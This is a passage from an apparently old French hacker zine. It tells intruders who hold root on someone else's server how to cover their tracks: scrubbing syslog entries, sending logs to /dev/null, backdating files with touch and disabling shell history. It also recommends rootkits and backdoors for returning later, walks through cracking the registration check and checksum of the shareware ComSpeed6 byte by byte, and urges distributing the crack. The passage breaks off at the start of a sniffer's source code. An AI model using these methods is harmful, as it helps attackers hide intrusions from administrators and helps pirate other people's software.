bon vous semble, et cela sans que personne s'en aperçoive... Regardons donc la démarche à suivre, sous Linux: La première chose que vous aurez à faire une fois votre shell root obtenu, c'est de modifier tous les logs du serveur qui pourraient aider l'administrateur à vous retrouver. Il existe trois types de logs, les syslogs, qui notent les messages envoyés au root par le systeme, le lastlog, et les historiques. Commençons par les syslogs: Pour effacer vos traces dans le systeme, faites (ou nom_de_domaine, adresse_ip et nom doivent être remplacés par les données du serveur) >sh-2.05$ cat /etc/syslog.conf >sh-2.05$ cat log | grep -v nom_de_domaine | grep -v adresse_ip > nom >sh-2.05$ cat nom > log >sh-2.05$ rm nom Voilà, nos traces sont effacées. On va maintenant rediriger les logs dans un endroit ou personne ne pourra les retrouver. D'abord, noter la date et l'heure du dernier changement de syslog.conf: >sh-2.05$ cp/syslog.conf nom >sh-2.05$ emacs syslog.conf Ensuite on va tout rediriger dans /dev/null. Puis: >sh-2.05$ killall -HUP syslogd Maintenant on remet tout en place: >sh-2.05$ mv nom syslog.conf >sh-2.05$ touch -t yyyymmddhhmm.ss syslog.conf. Et voilà. Ca, c'était pour les syslogs, maintenant: Occupons nous du lastlog. Ce log enregistre la dernière connection de chaque utilisateur avec le port et l'adresse depuis lesquels il s'est connecté. Notre travail va consister à se relogger sur sa machine afin de faire disparaître la connection locale. Pour cela, faites: >bash-2.05# rlogin root@localhost Voilà c'est tout, pas trop dur mouarf... Maintenant: On va s'occuper des historiques. Ces fichiers enregistrent toutes les actions que vous commandez avec votre minable shell root... Chaque shell possède un fichier d'historiques dans le répertoire de son utilisateur: - sh: .sh_history - csh: .history - ksh: .sh_history - bash: .bash_history - zsh: .history - tcsh: .history Vous allez donc devoir en premier lieu, changer de shell pour effacer l'historique du shell précedent. Dans pratiquement tous les cas, votre shell sera sh. Maintenant regardons si le fichier .tcshrc existe, si oui, notons l'heure de sa dernière modification, puis faisons: >sh-2.05$ mv .tcshrc.nom >sh-2.05$ echo "set histfile=/dev/null" > .tcshrc >sh-2.05$ tcsh L'historique sera donc redirigée vers /dev/null. Il ne reste plus qu'à effacer du fichier .sh_history toutes les actions que l'on a faites depuis le début. Puis, juste avant de partir, faites la manipulation inverse: >root@hacked~>mv.nom.tcshrc (ou rm.tcshrc si vous venez de le créer) >root@hacked~>touch -t yyyymmddhhmm.ss .tcshrc avec l'heure à laquelle il a été crée >root@hacked~>logout Voilà désormais, toutes les traces de votre passage sont effacées. Maintenant vous allez devoir faire ce que l'on apelle une backdoor (=porte de derrière, un accès caché quoi) afin de revenir dès que vous le désirez. Pour cela, il existe des rootkits, des backdoors déjà toutes preparées, à votre disposition sur la toile. :)) Alors elle est pas belle la vie? Mais faites attention, c'est mauvais de revenir sur les lieux de son crime. Mieux vaut vous loggez sur un autre compte avant de revenir sur un serveur... Prenez garde !!! :p ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 21°/La programmation, ce qu'il faut savoir maîtriser ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Bon, ce n'est un secret pour personne, mais le langage le plus important dans le hacking, c'est le C. Cependant, je ne vous conseille pas d'apprendre le C en premier si vous débutez. Il faut d'abord que vous assimiliez certaines notions de programmation et surtout que vous soyiez calé en math (nan je plaisante détendez vous :op)... Alors par où commencer? Personnelement je vous dirais par le Visual Basic, du moins si vous connaisez déjà un peu le BASIC. Sinon, apprenez le delphi et aussi, très important, le HTML, bien que ce ne soit pas véritablement un langage de programmation, il est très utile pour faciliter l'apprentissage du C. Ensuite donc, apprenez le C. Puis vous passerez au C++ (malgrès la ressemblance ce sont des langages très différents vous verrez). Et puis après, essayez d'apprendre le Java, ce langage est très tourné vers l'avenir du hack, il vous sera sans doute bien utile dans les années à venir. Apprenez aussi quelques commandes DOS et linux (même si on peut pas trop parler de programmation dans ces deux cas). Une chose également très importante, quelque soit le langage que vous apprenez, c'est le compilateur. C'est un outil qui vous permet de programmer, et de compiler votre programme, c'est à dire le rendre éxecutable. Cherchez en sur le Net. Pour ce qui est des cours de programmations, le mieux c'est d'apprendre dans les livres, pas dans les zines qui fatiguent trop la vue ou devant un enseignant qui fatigue trop les oreilles... N'oubliez jamais, la programmation est l'essence même du bon hacker. Le stade ultime pour celui-ci, c'est d'apprendre un langage en seulement quelques jours. Une dernière chose, pour bien maîtriser un langage de programmation, il y'a deux choses essentielles: lire du code et écrire du code. Vous aurez beau connaître toutes les commandes possibles du C, vous ne pourrez jamais vous considerez comme un vrai programmeur tant que vous ferez pas vous même vos propres programmes. Voilà, j'espere m'être fait compris. On va tout de même rester dans la programmation avec le petit cours d'ASM qui va suivre... :-> ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 22°/Introduction au cracking, manipuler l'Assembleur (ASM) ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Le cracking consiste à faire sauter les protections d'un programme, afin de le diffuser gratuitement sur le net. Il existe deux méthodes pour cracker un programme: * Live Approach: Cette méthode consiste à débugger le programme en lui posant des breack points et en le tracant. On utilisera pour ce faire un debuggeur, comme par exemple SoftIce. * Dead listing: Cette méthode nous interessera plus particulièrement car elle consiste à dessasembler un programme quelconque afin de modifier son shéma de protection. On utilisera un déssasembleur, W32Dasm est le plus adapté si vous avez Windows 9x. Nous allons cracker ComSpeed6, comme il ne fait que 53ko, nous utiliserons le "Dead Listing". Nous aurons besoin pour ce crack de W32Dasm6. Lancez donc le desassembleur et ouvrez ComSpeed6. Cliquez sur "String Data reference" dans la barre d'outil. Vous allez obtenir entre autre: >CodeFalse_ >CodeOk_ >Virus_ Jetez un oeil sur CodeOk. W32Dasm vous envoie sur la routine qui commence à l'adresse 0011.0271. Juste après on trouve la procédure CodeFalse en 0011.02A4. Voilà ce que ca donne: >0011.0262 9AFFFF0000 call 0012.02E5h >0011.0267 08C0 or al , al >0011.0269 7433 je 029E >0011.026B FF76F0 push word ptr [bp+F0] >0011.026E FF76EE push word ptr [bp+EE] >* Possible StringData Ref from Data Seg 017 ->"CODEOK_%s" >0011.0271 BFF104 mov di, 04F1 >0011.0274 1E push ds On y trouve un saut conditionnel, je029E qui nous enverra sur la procédure CodeFalse si le mot de passe est incorrect. On le change en jne: >0011.0269 7533 jne 029E Lancez maintanant ComSpeed6 avec un éditeur hexadécimal. Le programme nous dit: >"The .exe file has been modified! That can be a Virus..." Vous vous rappelez de Virus_? C'est un checksum, le programme additione les bytes et vérifie le résultat. Nous avons changé un je (74) par un jne (75). Nous allons modifier les bytes qui suivent. Nous avions: >0011.0269 7433 je 029E Que nous avons changé en : >0011.0269 7533 jne 029E On va donc modifier le 33 qui suit. Cela nous donne: >0011.0269 7532 jne 029E Car 75+32=74+33. Le checksum est contourné. Lancez maintenant ComSpeed6 et registrez vous avec n'importe quel mot de passe, ca marche. Quittez ComSpeed6 et relancez le, il n'est plus enregistré. :-( Nous nous sommes juste débarassés de la procédure de vérification du mot de passe, le crack est loin d'être terminé. Maintenant ouvrez ComSpeed.ini. On obtient: >SwName=_Votre_Nom >SwCode=_Votre_Mot_De_Passe Vous savez donc comment le programme enregistre votre nom et votre mot de passe. Revenons à notre W32Dasm6. Cliquez dans la barre à outil sur "Import Functions". Une liste de toutes les fonctions de Windows (les API) va s'afficher. Pour créer une barre de menu, un programme Windows doit appeller la fonction "User!DrawMenuBar. Cliquez sur elle pour visualiser les différents appels à celle-ci dans ComSpeed. On trouve deux appels. Le deuxième est très intéressant: >0001.1756 9AFFFF0000 call 0011.0122h >0001.175B 803ED00400 cmp byte ptr [04D0], 00 >0001.1760 7531 jne 1793 >0001.1762 FF363C0A push word ptr [0A3C] >0001.1766 FF363A0A push word ptr [0A3A] >0001.176A 9AFFFF0000 call 0006.0044h >0001.176F FF363407 push word ptr [0734] >0001.1773 6A02 push 0002 >0001.1775 680004 push 0400 >0001.1778 9AFFFF0000 call USER.DELETEMENU >0001.177D FF760E push word ptr [bp+0E] >0001.1780 9AFFFF0000 call USER.DRAWMENUBAR >0001.1785 FF760E push word ptr [bp+0E] >0001.1788 6A00 push 0000 On constate donc à l'adresse 0001.1778 l'appel à la procédure User!DeleteMenu qui va effacer la barre de menu et tout de suite après, l'appel à User!DrawMenuBar qui va en créer un nouvelle sans le mot "shareware". Encore un peu au dessus, on trouve un saut conditionnel, jne 1793, qui, si 04D0 est différent de zéro, nous fera sauter par dessus les deux fonctions User!DeleteMenu et User!DrawMenuBar. On en déduit donc que, si "byte ptr [04D0]=0" , alors le programme est enregistré. "cmp byte ptr [04D0], 00" est présent dix fois dans le listing de ComSpeed6. On va maintenant chercher l'instruction qui va écrire à l'adresse 04D0. On en trouve qu'une seule: >0011.0D27 9AFFFF0000 call 0012.02E5h >0011.0D2C 08C0 or al , al >0011.0D2E B000 mov al, 00 ; al:=0 >0011.0D30 7501 jne 0D33 >0011.0D32 40 inc ax ; al:=al+1 >0011.0D33 A2D004 mov [04D0], al ; **ICI** 04D0=al >0011.0D36 803ED00400 cmp byte ptr [04D0], 00 >0011.0D3B 7527 jne 0D64 >0011.0D3D FF36D404 push word ptr [04D4] >0011.0D41 FF36D204 push word ptr [04D2] A cause du checksum, on ne peut pas se permettre de modifier le jne 0D64 en je 0D64. On va donc plutôt intervertir les instructions. Nous avions: >0011.0D2E B000 mov al, 00 >0011.0D30 7501 jne 0D33 >0011.0D32 40 inc ax >0011.0D33 A2D004 mov [04D0], al >0011.0D36 803ED00400 cmp byte ptr [04D0], 00 >0011.0D3B 7527 jne 0D64 Que l'on peut changer en: >0011.0D2E 7501 jne 0D31 >0011.0D30 40 inc ax ; al:=al+1 >0011.0D31 B000 mov al, 00 ; al:=0 >0011.0D33 A2D004 mov [04D0], al >0011.0D36 803ED00400 cmp byte ptr [04D0], 00 >0011.0D3B 7527 jne 0D64 Et voilà !!! Désormais "al=0" et l'instruction "mov [04D0], al" donnera la valeur zéro, donc "Registered, dans l'adresse 04D0. Le résultat de "cmp byte ptr [04D0], 00" sera donc toujours vrai et ComSpeed6 ne s'en aperçevra pas. Il est maintenant enregistré. Vous n'avez plus qu'à mettre votre crack en télechargement gratuit sur Internet... Voilà !!! Cet exemple devrait vous aider par la suite pour cracker d'autres programmes de la même catégorie. Si vous voulez vraiment TOUT savoir sur l'ASM cherchez dans une librairie le bouquin "Assembleur Pratique", de B.Fabrot, il doit bien pouvoir se trouver quelque part. :)) ²²²²²²²²²²²²²²²²²²²²²²²²² ² 23°/L'art du sniffing ² ²²²²²²²²²²²²²²²²²²²²²²²²² Pour sniffer, déjà, il faut que vous ayez un sniffer (lol). Un sniffer est un outil permettant d'intercepter des packet contenant des données, qui circulent sur un réseau. Ces données sont bien entendus codées, et varient selon le filtrage de packets que vous utilisez, le protocole que vous sniffez. Voici maintenant une liste des sniffers les plus utilisés: -Esniff, trouvable un peu partout sur le net. Voici son code source, à compiler en c : /* Esniff.c */ #include